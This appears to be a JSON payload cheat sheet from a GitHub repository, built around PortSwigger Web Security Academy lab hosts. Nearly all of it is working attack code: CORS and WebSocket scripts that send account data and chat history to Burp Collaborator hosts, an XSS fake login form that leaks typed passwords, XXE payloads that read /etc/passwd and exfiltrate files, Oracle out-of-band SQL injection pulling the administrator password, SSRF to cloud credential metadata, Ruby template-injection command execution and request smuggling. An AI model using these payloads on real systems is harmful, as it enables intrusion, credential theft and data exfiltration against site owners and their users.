-
Notifications
You must be signed in to change notification settings - Fork 0
/
web.json
1 lines (1 loc) · 13.4 KB
/
web.json
1
[{"name": "CORS ACAO", "description": "Access-Control-Allow-Credentials and Access-Control-Allow-Origin, you need to see a reflected Origin in the base request.", "commands": [{"command": "<script>\n var req = new XMLHttpRequest(); \n req.onload = reqListener; \n req.open('get','https://0a1d006403e648ad82697461005e00a5.web-security-academy.net/accountDetails',true);\n req.withCredentials = true; \n req.send(); \n function reqListener() { \n fetch('//ceuppgwls7mqp4fxey3bvf93eukl8ew3.oastify.com/log?key='+this.responseText); \n };\n</script>\n", "description": "Normal xhr request with credentials, exfiltration to Burp Collaborator."}, {"command": "<iframe sandbox=\"allow-scripts allow-top-navigation allow-forms\" src=\"data:text/html,\n<script>\nvar req = new XMLHttpRequest(); \nreq.onload = reqListener; \nreq.open('get','https://0a1d006403e648ad82697461005e00a5.web-security-academy.net/accountDetails',true);\nreq.withCredentials = true; \nreq.send(); \nfunction reqListener() { \n fetch('//ceuppgwls7mqp4fxey3bvf93eukl8ew3.oastify.com/log?key='+this.responseText); \n};\n</script>\"></iframe>\n", "description": "XHR request with null Origin."}], "slug": "cors-acao", "id": 0, "tags": [{"name": "Authentication", "slug": "authentication"}, {"name": "CORS", "slug": "cors"}, {"name": "Access Control", "slug": "access-control"}]}, {"name": "Request Smuggling Capturing other users requests", "description": null, "commands": [{"command": "POST / HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nTransfer-Encoding: chunked\nContent-Length: 354\n\n0\n\nPOST /post/comment HTTP/1.1\nHost: 0a3b00ed0402b2df8324140a00cf0046.web-security-academy.net\nContent-Type: application/x-www-form-urlencoded\nCookie: session=6Jd83sI6vELILMHylDDghwQHmP1E1GPG\nContent-Length: 950\ncsrf=d1Pulb3OID1cikuQ7DP3eCvYCRrPm4vx&postId=9&name=%3Ch5%3EAesir%3C%2Fh5%3E&email=hi%40hi.com&website=http%3A%2F%2Fqc027bl9&comment=\n", "description": "Verify how CSRF works, in this case CSRF token is linked to the session. Update Content-Length based on response, if the requests timeouts, decrease the number."}], "slug": "request-smuggling-capturing-request", "id": 1, "tags": [{"name": "HTTP request smuggling", "slug": "http-request-smuggling"}]}, {"name": "Blind SQL injection using out-of-band (OAST)", "description": "Oracle DB", "commands": [{"command": "'||(SELECT EXTRACTVALUE(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \"http://'||(SELECT password FROM users WHERE username='administrator')||'.esaqgemoq3g95cibz02ta3ryopugi86x.oastify.com/\"> %remote;]>'),'/l') FROM dual)||'\n", "description": null}], "slug": "sqli-blind-oast", "id": 2, "tags": [{"name": "SQLi", "slug": "sqli"}, {"name": "XXE", "slug": "xxe"}, {"name": "OAST", "slug": "oast"}]}, {"name": "SSRF filter bypass", "description": "Basic SSRF bypass, use python script for advanced bypasses.", "commands": [{"command": "localhost\nlocalhost:6566\nLocalhost\nLocalHost\nlOcAlhOsT\nLOcalHOSt\n[::]\n[0000::1]\n[0:0:0:0:0:ffff:127.0.0.1]\n127.0.0.1\n127.0.0.2\n127.0.0.3\n2130706433 \n3232235521\n3232235777\n017700000001\n127.4\n127.0.0.2\n127.1\n127.0.1\n127%E3%80%820%E3%80%820%E3%80%821\n", "description": null}], "slug": "ssrf-filter-bypass", "id": 3, "tags": [{"name": "SSRF", "slug": "ssrf"}]}, {"name": "SSTI Ruby RCE", "description": "Different payloads for Ruby", "commands": [{"command": "<%= system(\"whoami\") %>\n<%= Dir.entries('/') %>\n<%= File.open('/etc/passwd').read %>\n<%= system('cat /etc/passwd') %>\n<%= `ls /` %>\n<%= IO.popen('ls /').readlines() %>\n<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>\n<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>\n", "description": null}], "slug": "ssti-ruby", "id": 4, "tags": [{"name": "SSTI", "slug": "ssti"}, {"name": "RCE", "slug": "rce"}]}, {"name": "SSTI identify", "description": "Basic commands to identify template injection.", "commands": [{"command": "${{<%[%'\"}}%\\.", "description": "Polyglot"}, {"command": "${7*7}\n{{7*7}}\na{*aa*}b\n{{7*'7'}}\n<%= 7*7 %>\n<%= foobar %>\n", "description": "Payloads for different templating processors."}], "links": ["ssti-ruby"], "slug": "ssti-simple", "id": 5, "tags": [{"name": "SSTI", "slug": "ssti"}]}, {"name": "CSRF voer Websocket to steal chat history", "description": "Weak SameSite cookie policy. Host this on the exploit server.", "commands": [{"command": "<script>\nlet ws = new WebSocket(\"wss://0a690041049f5154821d60560049000c.web-security-academy.net/chat\");\nws.onopen = () => {\n ws.send(\"READY\")\n}\n\nws.onmessage = (e) => {\n fetch(\"https://7w4j95gw2b9amvqjwbpfjphbe2kt8kw9.oastify.com\", {method:\"POST\", mode: 'no-cors', body:e.data})\n}\n</script>\n", "description": null}], "slug": "websocket-csrf-exfil", "id": 6, "tags": [{"name": "CSRF", "slug": "csrf"}, {"name": "WebSocket", "slug": "websocket"}]}, {"name": "Basic XSS over Websocket", "description": null, "commands": [{"command": "{ \"message\": \"<img src=x onerror='alert()'>\" }\n", "description": null}], "slug": "websocket-xss", "id": 7, "tags": [{"name": "XSS", "slug": "xss"}, {"name": "WebSocket", "slug": "websocket"}]}, {"name": "Basic XSS payloads with simple obfuscation", "description": null, "commands": [{"command": "jAvAScriPt:AlErT(1)\nalert`1`\n<img src=1 oNERroR=alert`1`>\n<img src=x onerror='alert()' />\neval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))\n\"><script>alert()</script>\n</script><script>alert(1)</script>\n\"-alert()}//\n'-alert(1)-'\n<<img src=x onerror='alert()' />>\n\\'-alert(1)// \n\\';alert(1)//\n${alert(document.domain)}\ndocument['cookie']\ndocument.cookie\ndocument.\\u0063ookie\neval(\"\\u0061lert(1)\")\njavascript\\u{0000000003a}alert(1)\neval(\"\\x61lert\")\neval(\"\\141lert(1)\")\njavascript:\u0061lert(1)\n", "description": null}], "slug": "xss-basic", "id": 8, "tags": [{"name": "XSS", "slug": "xss"}]}, {"name": "Using XSS to create a fake login form", "description": "This renders a login form in the comment section.", "commands": [{"command": "<form action=https://3aee9zdfq8rznu4uh7yw5k03hunlbcz1.oastify.com>\n <input type=\"username\" name=\"username\" placeholder=\"Username\" onchange=\"javascript:fetch('https://d3ho296pjik9g4x4ahr6yutda4gv4nsc.oastify.com/username?' + this.value, {mode: 'no-cors'})\">\n <input type=\"password\" name=\"password\" placeholder=\"Password\" onchange=\"javascript:fetch('https://d3ho296pjik9g4x4ahr6yutda4gv4nsc.oastify.com/password?' + this.value, {mode: 'no-cors'})\">\n <input type=\"submit\" name=\"submit\" value=\"Login\">\n</form>\n", "description": "No submit is needed because we use the onchange event."}], "slug": "xss-csrf-login-form", "id": 9, "tags": [{"name": "XSS", "slug": "xss"}, {"name": "CSRF", "slug": "csrf"}]}, {"name": "Using XSS to bypass CSRF protections", "description": "Using XSS to get the CSRF token and execute a CSRF protected action.", "commands": [{"command": "<script>\nsetTimeout(() => {\n let token = document.getElementsByName('csrf')[0].value;\n fetch('/my-account/change-email', { method: 'POST', credentials: 'same-origin', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: new URLSearchParams({email:\"[email protected]\", csrf: token})}); \n}, 2000);\n</script>\n", "description": null}], "slug": "xss-csrf", "id": 10, "tags": [{"name": "XSS", "slug": "xss"}, {"name": "CSRF", "slug": "csrf"}]}, {"name": "Error based XXE with external dtd", "description": null, "commands": [{"command": "<!ENTITY % file SYSTEM \"file:///etc/passwd\">\n<!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>\">\n%eval;\n%error;\n", "description": "External hosted dtd, which errors because the second entity does not exist. Only works when errors are displayed."}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE stockCheck [ \n <!ENTITY % remote SYSTEM \"https://exploit-0a670061047a8aca823e644301e900d7.exploit-server.net/exploit.dtd\">\n %remote;\n]>\n\n<stockCheck><productId>9</productId><storeId>1</storeId></stockCheck>\n", "description": "Payload to load the external dtd file and call %remote."}], "slug": "xxe-external-dtd-error", "id": 11, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE external dtd", "description": "XXE attack with an external hosted dtd file.", "commands": [{"command": "<!ENTITY % file SYSTEM \"file:///etc/hostname\">\n<!ENTITY % oob \"<!ENTITY % content SYSTEM 'https://exploit-0abd004f034a3ca18694038401ae00d6.exploit-server.net?content=%file;'>\">\n%oob;\n%content;\n", "description": "External hosted dtd, which exfiltrates /etc/hostname to an exploit server. The % symbol inside the oob entity has to be hex encoded."}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE stockCheck [ \n <!ENTITY % remote SYSTEM \"https://exploit-0abd004f034a3ca18694038401ae00d6.exploit-server.net/exploit2.dtd\">\n %remote;\n]>\n<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>\n", "description": "Payload to load the external dtd file and call %remote."}], "slug": "xxe-external-dtd", "id": 12, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE LFI Xinclude", "description": null, "commands": [{"command": "productId=<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>&storeId=1\n", "description": "LFI with Xinclude"}], "slug": "xxe-lfi-xinclude", "id": 13, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE LFI", "description": "LFI payloads for XXE with custom and parameter entities.", "commands": [{"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]> \n<stockCheck>\n <productId>&xxe;</productId>\n</stockCheck>\n", "description": "LFI with custom entities"}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> ]> \n<stockCheck>\n <productId>%xxe;</productId>\n</stockCheck>\n", "description": "LFI with parameter entities"}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<@hex_entities>\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]> \n<@hex_entities>\n<stockCheck>\n <productId>&xxe;</productId>\n</stockCheck>\n", "description": "HEX encoded command with HackVector"}], "slug": "xxe-lfi", "id": 14, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE with local dtd", "description": "This requires a local dtd file. See references for a wordlist.", "commands": [{"command": "<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\"> <!ENTITY % ISOamsb '<!ENTITY % file SYSTEM \"file:///etc/passwd\"><!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error;'> %local_dtd;%ISOamsb;]>\n", "description": "Error based dtd attack, it is important to encode %, & and % for the second entity."}], "references": ["https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/"], "slug": "xxe-local-dtd", "id": 15, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}, {"name": "XXE OAST attack", "description": null, "commands": [{"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://il7x2chwkv9xg2k75cd8do2ft6zxnvbk.oastify.com\"> ]>\n<stockCheck><productId>1&xxe;</productId><storeId>1</storeId></stockCheck>\n", "description": "OAST with custom entities"}, {"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM \"http://wyybfquax9mbtgxliqqmq2ft6kcb0do2.oastify.com\"> %xxe;]>\n<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>\n", "description": "OAST with parameter entities"}], "slug": "xxe-oast", "id": 16, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "OAST", "slug": "oast"}]}, {"name": "XXE SQLi", "description": "SQL injection inside XXE payload", "commands": [{"command": "<storeId>\n<@hex_entities>\n1 UNION SELECT password || '~' || username from users;\n<@/hex_entities>\n</storeId>\n", "description": "HEX encoded SQLi with XXE and combinding two rows with ~"}], "slug": "xxe-sqli", "id": 17, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "SQLi", "slug": "sqli"}]}, {"name": "XXE SSRF attack", "description": "SSRF attack over XXE", "commands": [{"command": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE productId \n[<!ENTITY ssrf SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/admin\" > ]>\n<stockCheck>\n <productId>&ssrf;</productId>\n <storeId>1</storeId>\n</stockCheck>\n"}], "slug": "xxe-ssrf", "id": 18, "tags": [{"name": "SSRF", "slug": "ssrf"}, {"name": "XXE", "slug": "xxe"}]}, {"name": "XXE SVG LFI", "description": "Indirect LFI via an SVG image.", "commands": [{"command": "Content-Disposition: form-data; name=\"avatar\"; filename=\"dog.svg\"\nContent-Type: image/svg\n<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n", "description": "This will create an image with the contents of /etc/hostname"}], "slug": "xxe-svg", "id": 19, "tags": [{"name": "XXE", "slug": "xxe"}, {"name": "LFI", "slug": "lfi"}]}]